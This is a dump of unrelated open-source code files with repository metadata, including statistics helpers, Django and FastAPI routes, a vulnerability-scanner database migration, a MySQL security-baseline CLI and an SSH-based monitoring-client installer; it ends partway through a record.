] | null | null | null | Statistics/Population_corelation_coefficient.py | rar9898/StatisticalCalculator | 34ffd7e9e60facd5cce7af3e43ceb244f741138b | [
"MIT"
] | null | null | null | from Statistics.ZScore import zscore
from Statistics.Mean import mean
from Statistics.StandardDeviation import standard_deviation
from Calculator.Subtraction import subtraction
from Calculator.Division import division
from Calculator.Multiplication import multiplication
from Calculator.Addition import addition
def population_correlation_coefficient(numbers, numbers1):
m = zscore(numbers)
n = zscore(numbers1)
value = list(map(lambda a, b: a * b, m, n))
p = division(len(value), sum(value))
return p
"""
x = mean(numbers)
y = mean(numbers1)
m = []
n = []
t = 0
for i in numbers:
zn = division(standard_deviation(numbers), subtraction(x, i))
m.append(zn)
for i in numbers1:
zm = division(standard_deviation(numbers1), subtraction(y, i))
n.append(zm)
for i in range(len(numbers)):
jk = multiplication(m[i], n[i])
t = addition(t, jk)
res = division(subtraction(1, len(numbers), t))
return res
""" | 29.588235 | 70 | 0.676938 | 131 | 1,006 | 5.160305 | 0.343511 | 0.08284 | 0.026627 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008895 | 0.217694 | 1,006 | 34 | 71 | 29.588235 | 0.850064 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.538462 | 0 | 0.692308 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
a04b8036c2e618fe8ab0e227a7e9e5bace8accf3 | 806 | py | Python | src/controller/locationRoutes.py | Bocampagni/Shipping-api | 4cdf074467e4478885fe55d7c82a16e1a577b045 | [
"MIT"
] | null | null | null | src/controller/locationRoutes.py | Bocampagni/Shipping-api | 4cdf074467e4478885fe55d7c82a16e1a577b045 | [
"MIT"
] | null | null | null | src/controller/locationRoutes.py | Bocampagni/Shipping-api | 4cdf074467e4478885fe55d7c82a16e1a577b045 | [
"MIT"
] | null | null | null | """
Routes here:
- Where am I ?
- Return the street, city and country a given geolocation point is at.
- Linear distance (Haversine)
- Return the linear distance on a globe given two geo-coordinates.
"""
from fastapi import APIRouter
from src.service.HaversineService import linear_distance
from src.model.linearDistance import linearDistance
from src.model.pairCoordinate import pairCoordinate
from src.service.whereAmIService import getLocation
router = APIRouter()
@router.post("/linearDistance")
def get_linear_distance(distance: linearDistance):
result_in_kilometers = linear_distance(distance)
return {"Kilometers": result_in_kilometers}
@router.post("/whereAmI")
def get_where_am_i(local: pairCoordinate):
location = getLocation(local)
return {"Location": location}
| 26 | 74 | 0.776675 | 98 | 806 | 6.27551 | 0.479592 | 0.113821 | 0.026016 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.140199 | 806 | 30 | 75 | 26.866667 | 0.887446 | 0.254342 | 0 | 0 | 0 | 0 | 0.071066 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.357143 | 0 | 0.642857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
a0631cc292309e8b9997f259d7c5466d5db03bb2 | 267 | py | Python | datahub/investment/summary/urls.py | Staberinde/data-hub-api | 3d0467dbceaf62a47158eea412a3dba827073300 | [
"MIT"
] | null | null | null | datahub/investment/summary/urls.py | Staberinde/data-hub-api | 3d0467dbceaf62a47158eea412a3dba827073300 | [
"MIT"
] | 4 | 2021-06-30T10:34:50.000Z | 2021-06-30T10:34:51.000Z | datahub/investment/summary/urls.py | Staberinde/data-hub-api | 3d0467dbceaf62a47158eea412a3dba827073300 | [
"MIT"
] | null | null | null | from django.urls import path
from datahub.investment.summary.views import IProjectSummaryView
urlpatterns = [
path(
'adviser/<uuid:adviser_pk>/investment-summary',
IProjectSummaryView.as_view(),
name='investment-summary-item',
),
]
| 20.538462 | 64 | 0.696629 | 27 | 267 | 6.814815 | 0.666667 | 0.277174 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.194757 | 267 | 12 | 65 | 22.25 | 0.855814 | 0 | 0 | 0 | 0 | 0 | 0.250936 | 0.250936 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.222222 | 0 | 0.222222 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
a063d521cdf29cd6f0c8ec8a587747f330d103e6 | 1,598 | py | Python | VulnerableScan/migrations/0004_remove_exploitregister_file_object_and_more.py | b0bac/ApolloScanner | 26612454bfb302611e407e495c2943b27285f23d | [
"MIT"
] | 289 | 2022-03-17T01:37:11.000Z | 2022-03-31T16:04:00.000Z | VulnerableScan/migrations/0004_remove_exploitregister_file_object_and_more.py | SoryegeToon/ApolloScanner | 8f321976bf892b492e42fecdeb25f7d2e45f6a59 | [
"MIT"
] | 18 | 2022-03-17T02:43:05.000Z | 2022-03-30T03:10:56.000Z | VulnerableScan/migrations/0004_remove_exploitregister_file_object_and_more.py | SoryegeToon/ApolloScanner | 8f321976bf892b492e42fecdeb25f7d2e45f6a59 | [
"MIT"
] | 71 | 2022-03-17T02:23:06.000Z | 2022-03-31T13:30:38.000Z | # Generated by Django 4.0.1 on 2022-03-10 17:36
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('Assets', '0003_alter_assetlist_timestamp_alter_assettask_timestamp'),
('VulnerableScan', '0003_alter_exploitregister_timestamp_and_more'),
]
operations = [
migrations.RemoveField(
model_name='exploitregister',
name='file_object',
),
migrations.AddField(
model_name='exploitregister',
name='code',
field=models.TextField(db_column='code', null=True, verbose_name='负载代码'),
),
migrations.AddField(
model_name='exploitregister',
name='debug_info',
field=models.TextField(blank=True, db_column='debug_info', default='', null=True, verbose_name='调试信息'),
),
migrations.AddField(
model_name='exploitregister',
name='function_name',
field=models.CharField(db_column='function_name', default='', max_length=100, verbose_name='函数名称'),
),
migrations.AddField(
model_name='exploitregister',
name='target',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='Assets.assetlist', verbose_name='调试目标'),
),
migrations.AlterField(
model_name='exploitregister',
name='description',
field=models.TextField(db_column='description', verbose_name='负载描述'),
),
]
| 35.511111 | 148 | 0.621402 | 158 | 1,598 | 6.075949 | 0.417722 | 0.05625 | 0.15 | 0.175 | 0.25 | 0.191667 | 0 | 0 | 0 | 0 | 0 | 0.021867 | 0.255945 | 1,598 | 44 | 149 | 36.318182 | 0.785534 | 0.02816 | 0 | 0.421053 | 1 | 0 | 0.219213 | 0.065119 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.052632 | 0 | 0.131579 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
a08de9a7f78d2b4c6c046592a71b3e0b286148ff | 1,391 | py | Python | misc/make_fulltohalf.py | atsuoishimoto/pyjf3 | 6f4b22e24c8f3bae5120b00e1de86e66fabb1785 | [
"Unlicense"
] | null | null | null | misc/make_fulltohalf.py | atsuoishimoto/pyjf3 | 6f4b22e24c8f3bae5120b00e1de86e66fabb1785 | [
"Unlicense"
] | 2 | 2015-10-01T20:41:28.000Z | 2016-03-14T14:50:41.000Z | misc/make_fulltohalf.py | atsuoishimoto/pyjf3 | 6f4b22e24c8f3bae5120b00e1de86e66fabb1785 | [
"Unlicense"
] | null | null | null | import unicodedata
import unicodedata
chars = []
for c in range(1, 65536):
c = unichr(c)
name = unicodedata.name(c, '')
if name.startswith("FULLWIDTH") or name.startswith("HALFWIDTH"):
chars.append((name, c))
d = {}
for name, c in chars:
p = name.split()
if p[0] in ('HALFWIDTH', 'FULLWIDTH'):
name = " ".join(p[1:])
normal = full = half = None
try:
normal = unicodedata.lookup(name)
except KeyError:
pass
try:
full = unicodedata.lookup("FULLWIDTH "+name)
except KeyError:
pass
try:
half = unicodedata.lookup("HALFWIDTH "+name)
except KeyError:
pass
if normal or full or half:
d[name] = (normal, full, half)
d2 = {}
for name, (normal, full, half) in d.items():
if full:
if normal:
pair = (full, normal)
elif half:
pair = (full, half)
if half:
if normal:
pair = (normal, half)
elif full:
pair = (full, half)
try:
pair[0].encode("cp932")
pair[1].encode("cp932")
except UnicodeEncodeError:
continue
d2[name] = pair
d2['YEN SIGN'] = (u'\uffe5', u'\x5c')
l = []
for name, (full, half) in d2.items():
print "%r:%r,\t# %s" % (full, half, name)
| 20.761194 | 69 | 0.498922 | 161 | 1,391 | 4.310559 | 0.304348 | 0.080692 | 0.060519 | 0.095101 | 0.072046 | 0 | 0 | 0 | 0 | 0 | 0 | 0.024915 | 0.365205 | 1,391 | 66 | 70 | 21.075758 | 0.761042 | 0 | 0 | 0.32 | 0 | 0 | 0.073318 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.06 | 0.04 | null | null | 0.02 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
a08e666451ce46ff1ce96123e7fca104a0847a50 | 957 | py | Python | server/service_user/exports.py | yseiren87/jellicleSpace | 10d693bbc04e6b89a7ce15d2dc9797cec2a553b7 | [
"Apache-2.0"
] | null | null | null | server/service_user/exports.py | yseiren87/jellicleSpace | 10d693bbc04e6b89a7ce15d2dc9797cec2a553b7 | [
"Apache-2.0"
] | 7 | 2021-03-19T04:47:00.000Z | 2021-09-22T19:10:46.000Z | server/service_user/exports.py | yseiren87/jellicleSpace | 10d693bbc04e6b89a7ce15d2dc9797cec2a553b7 | [
"Apache-2.0"
] | null | null | null | from service_user.models import UserModel
from django.core.exceptions import ValidationError
def get_user_instance_with_session_id(user_id, session_id):
try:
instance = UserModel.objects.get(
user_id__exact=user_id,
session_id__exact=session_id
)
except (UserModel.DoesNotExist, ValidationError):
return None
return instance
def is_valid_user_with_session_id(user_id, session_id):
return get_user_instance_with_session_id(user_id, session_id) is not None
def get_user_instance_with_token_id(user_id, token_id):
try:
instance = UserModel.objects.get(
user_id__exact=user_id,
token_id__exact=token_id
)
except (UserModel.DoesNotExist, ValidationError):
return None
return instance
def is_valid_user_with_token_id(user_id, token_id):
return get_user_instance_with_token_id(user_id=user_id, token_id=token_id) is not None
| 26.583333 | 90 | 0.734587 | 134 | 957 | 4.791045 | 0.201493 | 0.102804 | 0.087227 | 0.11838 | 0.775701 | 0.746106 | 0.727414 | 0.65109 | 0.551402 | 0.551402 | 0 | 0 | 0.207941 | 957 | 35 | 91 | 27.342857 | 0.846966 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.083333 | 0.083333 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
a090bdf83760eb6503d8fb43df6988333a3549dc | 178 | py | Python | basics/8 - conditional logic/app.py | gilbertgit95/py-tests | cc0028a92b40cd6f5476a184b1c6d69009c5a68a | [
"MIT"
] | null | null | null | basics/8 - conditional logic/app.py | gilbertgit95/py-tests | cc0028a92b40cd6f5476a184b1c6d69009c5a68a | [
"MIT"
] | 10 | 2020-02-12T02:55:21.000Z | 2022-02-10T09:46:47.000Z | basics/8 - conditional logic/app.py | gilbertgit95/py-tests | cc0028a92b40cd6f5476a184b1c6d69009c5a68a | [
"MIT"
] | null | null | null | province = input('Enter you province: ')
if province.lower() == 'surigao':
print('Hi, I am from Surigao too.')
else:
print(f'Hi, so your from { province.capitalize() }') | 29.666667 | 56 | 0.646067 | 25 | 178 | 4.6 | 0.72 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.179775 | 178 | 6 | 56 | 29.666667 | 0.787671 | 0 | 0 | 0 | 0 | 0 | 0.530726 | 0.117318 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.4 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
a0a44839a72d7d8be56e23c36ab6608c90156600 | 1,427 | py | Python | tests/test_primes.py | dazfuller/python_testing | 7ef763ce5a78dcda158364eb3c564dd74a9405a5 | [
"MIT"
] | null | null | null | tests/test_primes.py | dazfuller/python_testing | 7ef763ce5a78dcda158364eb3c564dd74a9405a5 | [
"MIT"
] | null | null | null | tests/test_primes.py | dazfuller/python_testing | 7ef763ce5a78dcda158364eb3c564dd74a9405a5 | [
"MIT"
] | null | null | null | """ Test cases for sample module
"""
import unittest
from sample.primes import (approx_number_primes, is_prime)
class TestPrimeMethods(unittest.TestCase):
""" Test the methods defined for prime numbers
"""
def test_approx_small_values(self):
""" Check that the method to approximate number of primes is
working as expected
"""
self.assertGreater(approx_number_primes(10), 4)
def test_approx_larger_values(self):
""" Determine if the method still works for slight larger values
"""
self.assertGreater(approx_number_primes(100), 25)
def test_known_primes(self):
""" Check a number of known primes to ensure the prime evaluator
method works
"""
self.assertTrue(is_prime(2))
self.assertTrue(is_prime(7))
self.assertTrue(is_prime(997))
self.assertTrue(is_prime(7907))
def test_known_non_primes(self):
""" Check that the prime evaluator correctly identify non-prime
numbers as non-prime
"""
self.assertFalse(is_prime(4))
self.assertFalse(is_prime(93))
self.assertFalse(is_prime(9994))
def test_prime_check_nonint(self):
""" Check that the method correctly raises an error if an invalid
type is provided
"""
with self.assertRaises(TypeError):
is_prime("Invalid")
| 31.711111 | 73 | 0.640505 | 175 | 1,427 | 5.057143 | 0.394286 | 0.071186 | 0.072316 | 0.094915 | 0.128814 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023166 | 0.274001 | 1,427 | 44 | 74 | 32.431818 | 0.831081 | 0.320252 | 0 | 0 | 0 | 0 | 0.008314 | 0 | 0 | 0 | 0 | 0 | 0.526316 | 1 | 0.263158 | false | 0 | 0.105263 | 0 | 0.421053 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
a0a7a1a4f0c41ecd55f54af87c75350bfdbefffc | 1,395 | py | Python | peachproxy/setup.py | Meddington/TravisExample | 334344a3bdf76cc81950f707003f73e7e5f06661 | [
"MIT"
] | null | null | null | peachproxy/setup.py | Meddington/TravisExample | 334344a3bdf76cc81950f707003f73e7e5f06661 | [
"MIT"
] | null | null | null | peachproxy/setup.py | Meddington/TravisExample | 334344a3bdf76cc81950f707003f73e7e5f06661 | [
"MIT"
] | null | null | null | from setuptools import setup
setup(
name = 'peachproxy',
version = '4.1.0',
#use_scm_version=True,
description = 'Peach Web Proxy API module',
long_description = "blah blah blah",
author = 'Peach Fuzzer, LLC',
author_email = 'contact@peachfuzzer.com',
url = 'http://peachfuzzer.com',
py_modules = ['peachproxy'],
entry_points = {'pytest11': ['peach = pytest_peach']},
setup_requires = ['setuptools_scm'],
install_requires = ['requests>=2.11'],
license = 'MIT',
keywords = 'peach fuzzing security test rest',
classifiers = [
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: POSIX',
'Operating System :: Microsoft :: Windows',
'Operating System :: MacOS :: MacOS X',
'Topic :: Security',
'Topic :: Software Development :: Quality Assurance',
'Topic :: Software Development :: Testing',
'Topic :: Utilities',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5'])
# end
| 32.44186 | 61 | 0.58638 | 137 | 1,395 | 5.89781 | 0.569343 | 0.164604 | 0.216584 | 0.128713 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020629 | 0.270251 | 1,395 | 42 | 62 | 33.214286 | 0.773084 | 0.017921 | 0 | 0 | 0 | 0 | 0.58114 | 0.016813 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.030303 | 0 | 0.030303 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
a0b95281e810c294a2a866c57cc8b3ec0542cc4d | 1,202 | py | Python | mopidy_beep/__init__.py | hayribakici/mopidy-beep | d534caff4f5469d2c24e4040f52a2e700834a680 | [
"Apache-2.0"
] | null | null | null | mopidy_beep/__init__.py | hayribakici/mopidy-beep | d534caff4f5469d2c24e4040f52a2e700834a680 | [
"Apache-2.0"
] | null | null | null | mopidy_beep/__init__.py | hayribakici/mopidy-beep | d534caff4f5469d2c24e4040f52a2e700834a680 | [
"Apache-2.0"
] | null | null | null | '''
Mopidy Beep Python module.
'''
import os
import mopidy
__version__ = '0.1'
class Extension(mopidy.ext.Extension):
'''
Mopidy Beep extension.
'''
dist_name = 'Mopidy-Beep'
ext_name = 'beep'
version = __version__
def get_default_config(self): # pylint: disable=no-self-use
'''
Return the default config.
:return: The default config
'''
conf_file = os.path.join(os.path.dirname(__file__), 'ext.conf')
return mopidy.config.read(conf_file)
def get_config_schema(self):
'''
Return the config schema.
:return: The config schema
'''
schema = super(Extension, self).get_config_schema()
return schema
def validate_environment(self):
# Any manual checks of the environment to fail early.
# Dependencies described by setup.py are checked by Mopidy, so you
# should not check their presence here.
pass
def setup(self, registry):
'''
Setup the extension.
:param mopidy.ext.Registry: The mopidy registry
'''
from .frontend import BeepFrontend
registry.add('frontend', BeepFrontend)
| 22.259259 | 74 | 0.613145 | 138 | 1,202 | 5.173913 | 0.463768 | 0.05042 | 0.044818 | 0.061625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002345 | 0.290349 | 1,202 | 53 | 75 | 22.679245 | 0.834701 | 0.343594 | 0 | 0 | 0 | 0 | 0.050822 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0.055556 | 0.166667 | 0 | 0.722222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
2611696052388cf7da145be3bdca70a633645ea6 | 3,089 | py | Python | db_bascline.py | wstart/DB_BaseLine | fb54b4faa199dfdf3539d8b7c855684e850cbee5 | [
"Apache-2.0"
] | 152 | 2018-04-23T00:47:23.000Z | 2022-03-24T07:34:40.000Z | db_bascline.py | Dm2333/DB_BaseLine | fb54b4faa199dfdf3539d8b7c855684e850cbee5 | [
"Apache-2.0"
] | 4 | 2018-05-24T03:09:39.000Z | 2021-06-12T07:40:46.000Z | db_bascline.py | wstart/DB_BaseLine | fb54b4faa199dfdf3539d8b7c855684e850cbee5 | [
"Apache-2.0"
] | 49 | 2018-04-23T00:57:22.000Z | 2022-03-24T07:34:42.000Z | # -*- coding: utf-8 -*-
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
from script.mysql_baseline import *
from loghandle import *
import getopt
if __name__ == "__main__":
bannber = '''
____ ____ ____ _ _ {''' + db_baseline_basic.getVersion() + '''}
| _ \| __ )| __ ) __ _ ___ ___| (_)_ __ ___
| | | | _ \| _ \ / _` / __|/ _ \ | | '_ \ / _ \\
| |_| | |_) | |_) | (_| \__ \ __/ | | | | | __/
|____/|____/|____/ \__,_|___/\___|_|_|_| |_|\___|
(https://github.com/wstart/DB_BaseLine)
--------------------------------------------------'''
supperdb = ["mysql"]
DBnames = ",".join(supperdb)
small_helper='''
Usage: python db_baseline.py [options]
python db_baseline.py -h for more infomation
'''
helper = '''
Usage: python db_baseline.py [options]
[Options]:
-v ,--version show version
-h,--help show help
-D,--database check DataBase type,default is mysql
support Database list: ''' + DBnames + '''
-H,--host host,Default:127.0.0.1
if host is not 127.0.0.1 or localhost only check command
-P,--database-port database port,Default:Database Default port
it will set by check script
-u,--database-user database rootuser,default:root
-p,--database-password database password,default:root
'''
plog = loghandle.getLogEntity()
plog.output(bannber, "INFO", showtime=False, showlevel=False)
runconfig = {
"database": "",
"host": "",
"database_port": "",
"database_user": "",
"database_password": ""
}
try:
opts, args = getopt.getopt(sys.argv[1:], "vhD:H:P:u:p:",
["version", "help", "database=", "host=", "database-port=", "database-user=",
"database-password="])
checkscript = ""
if len(opts) == 0:
print small_helper
exit()
for o, a in opts:
if o in ("-v", "--version"):
print("DB_BASELINE : " + db_baseline_basic.getVersion())
sys.exit()
elif o in ("-h", "--help"):
print helper
sys.exit()
elif o in ("-D", "--database"):
runconfig["database"] = a
elif o in ("-H", "--host"):
runconfig["host"] = a
elif o in ("-P", "--database-port"):
runconfig["database_port"] = a
elif o in ("-U", "--database-user"):
runconfig["database_user"] = a
elif o in ("-p", "--database-password"):
runconfig["database_password"] = a
if runconfig["database"] == "mysql":
checkscript = mysql_baseline(runconfig)
if checkscript != "":
result = checkscript.runtest()
else:
plog.output("No match DataBase Type","ERROR")
print small_helper
plog.output("DBBaseline exit()")
except getopt.GetoptError:
print helper
| 30.584158 | 112 | 0.499838 | 293 | 3,089 | 4.897611 | 0.337884 | 0.04878 | 0.029268 | 0.0223 | 0.165854 | 0.146341 | 0.122648 | 0.072474 | 0 | 0 | 0 | 0.007707 | 0.327938 | 3,089 | 100 | 113 | 30.89 | 0.683526 | 0.006798 | 0 | 0.126582 | 0 | 0.037975 | 0.454012 | 0.058056 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.063291 | 0.050633 | null | null | 0.063291 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
26174133f8e58b2e662f395618e6c08edeaae306 | 5,653 | py | Python | monitor/dispatch/install_clients.py | opnfv/bottlenecks | b6c7bba0c071b42172283e4d97a3641f6464857a | [
"Apache-2.0"
] | 1 | 2019-04-20T08:42:49.000Z | 2019-04-20T08:42:49.000Z | monitor/dispatch/install_clients.py | opnfv/bottlenecks | b6c7bba0c071b42172283e4d97a3641f6464857a | [
"Apache-2.0"
] | 2 | 2020-04-30T00:07:15.000Z | 2021-06-02T00:33:47.000Z | monitor/dispatch/install_clients.py | opnfv/bottlenecks | b6c7bba0c071b42172283e4d97a3641f6464857a | [
"Apache-2.0"
] | 3 | 2016-12-09T10:20:55.000Z | 2019-04-22T12:45:00.000Z | ##############################################################################
# Copyright (c) 2018 Huawei Tech and others.
#
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Apache License, Version 2.0
# which accompanies this distribution, and is available at
# http://www.apache.org/licenses/LICENSE-2.0
##############################################################################
'''
Currently supported installers are Apex, Compass...
Supported monitoring tools are Cadvisor, Collectd, Barometer...
Carefully, do not change the path or name of the configuration files which
are hard coded for docker volume mapping.
'''
import os
import logging
import yaml
import utils.infra_setup.passwordless_SSH.ssh as ssh
import argparse
logger = logging.getLogger(__name__)
parser = argparse.ArgumentParser(description='Monitoring Clients Dispatcher')
parser.add_argument("-i", "--INSTALLER_TYPE",
help="The installer for the system under monitoring")
# Barometer config and installation files
# /home/opnfv/bottlenecks/monitor/dispatch/install_barometer_client.sh
# /home/opnfv/bottlenecks/monitor/config/barometer_client.conf
# Cadvisor installation file
# /home/opnfv/bottlenecks/monitor/dispatch/install_cadvisor_client.sh
# Collectd config and installation files
# /home/opnfv/bottlenecks/monitor/dispatch/install_collectd_client.sh
# /home/opnfv/bottlenecks/monitor/config/collectd_client.conf
parser.add_argument("-s", "--INSTALlATION_SCRIPT",
help="The path of the script to install monitoring script")
parser.add_argument("-c", "--CLIENT_CONFIG", default="",
help="The path of the config of monitoring client")
parser.add_argument("-p", "--POD_DISCRIPTOR", default="/tmp/pod.yaml",
help="The path of pod discrition file")
args = parser.parse_args()
INSTALLERS = ['apex', 'compass']
if args.INSTALLER_TYPE not in INSTALLERS:
raise Exception("The installer is not supported.")
if not args.INSTALlATION_SCRIPT:
raise Exception("Must specify the client installation script path!")
if "barometer" in args.INSTALlATION_SCRIPT.lower():
CONFIG_FILE = "/etc/barometer_config/barometer_client.conf"
CONFIG_DIR = "barometer_config"
INSTALlATION_SCRIPT = "/etc/barometer_config/install.sh"
elif "collectd" in args.INSTALlATION_SCRIPT.lower():
CONFIG_FILE = "/etc/collectd_config/collectd_client.conf"
CONFIG_DIR = "collectd_config"
INSTALlATION_SCRIPT = "/etc/collectd_config/install.sh"
elif "cadvisor" in args.INSTALlATION_SCRIPT.lower():
CONFIG_DIR = "cadvisor_config"
INSTALlATION_SCRIPT = "/etc/cadvisor_config/install.sh"
else:
raise Exception("The monitor client is not supported")
def main():
with open(args.POD_DISCRIPTOR) as f:
dataMap = yaml.safe_load(f)
for x in dataMap:
for y in dataMap[x]:
print("Installing {} in: {}".format(INSTALlATION_SCRIPT, y))
pwd = idkey = ''
if (y['role'].lower() == 'controller') or (
y['role'].lower() == 'compute'):
ip = str(y['ip'])
user = str(y['user'])
if 'password' in y.keys():
pwd = str(y['password'])
if 'key_filename' in y.keys():
idkey = str(y['key_filename'])
if pwd:
ssh_d = ssh.SSH(user, host=ip, password=pwd)
elif idkey:
idkey = "/tmp/id_rsa"
ssh_d = ssh.SSH(user, host=ip, key_filename=idkey)
status, stdout, stderr = ssh_d.execute(
"cd /etc && if [ ! -d " + CONFIG_DIR +
" ]; then sudo mkdir " + CONFIG_DIR + "; fi"
)
if status:
print Exception(
"Command: \"mkdir {}\"".format(CONFIG_DIR) +
" failed."
)
logger.info(stdout.splitlines())
if args.CLIENT_CONFIG:
with open(args.CLIENT_CONFIG) as stdin_file:
ssh_d.run("sudo sh -c \"cat > " + CONFIG_FILE +
"\"",
stdin=stdin_file)
with open(args.INSTALlATION_SCRIPT) as stdin_file:
ssh_d.run("sudo sh -c \"cat > " + INSTALlATION_SCRIPT +
"\"",
stdin=stdin_file)
for u in os.uname():
if 'ubuntu' in u.lower():
NODE_OS = 'ubuntu'
break
if NODE_OS == 'ubuntu':
status, stdout, stderr = ssh_d.execute(
"sudo apt-get install -y docker.io"
)
else:
status, stdout, stderr = ssh_d.execute(
"sudo service docker start"
)
if status:
raise Exception(
"Command for installing docker failed.")
logger.info(stdout.splitlines())
ssh_d.run(
"cd /etc/{}/ && bash ./install.sh".format(CONFIG_DIR),
raise_on_error=False
)
if __name__ == '__main__':
main()
| 43.821705 | 79 | 0.537944 | 586 | 5,653 | 5.042662 | 0.303754 | 0.073096 | 0.033841 | 0.045685 | 0.225381 | 0.192893 | 0.157022 | 0.093401 | 0.064975 | 0.064975 | 0 | 0.002132 | 0.336105 | 5,653 | 128 | 80 | 44.164063 | 0.785238 | 0.12542 | 0 | 0.136842 | 0 | 0 | 0.222149 | 0.0439 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.052632 | 0.052632 | null | null | 0.021053 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
26441a9d01cbe05dfe88c39dbad0f18d05f95cd3 | 281 | py | Python | src/api/serializers/operations.py | artinnok/billing-gateway | fbb0b358066a0038e775e6a9c4d40bcdf8f79e8e | [
"MIT"
] | null | null | null | src/api/serializers/operations.py | artinnok/billing-gateway | fbb0b358066a0038e775e6a9c4d40bcdf8f79e8e | [
"MIT"
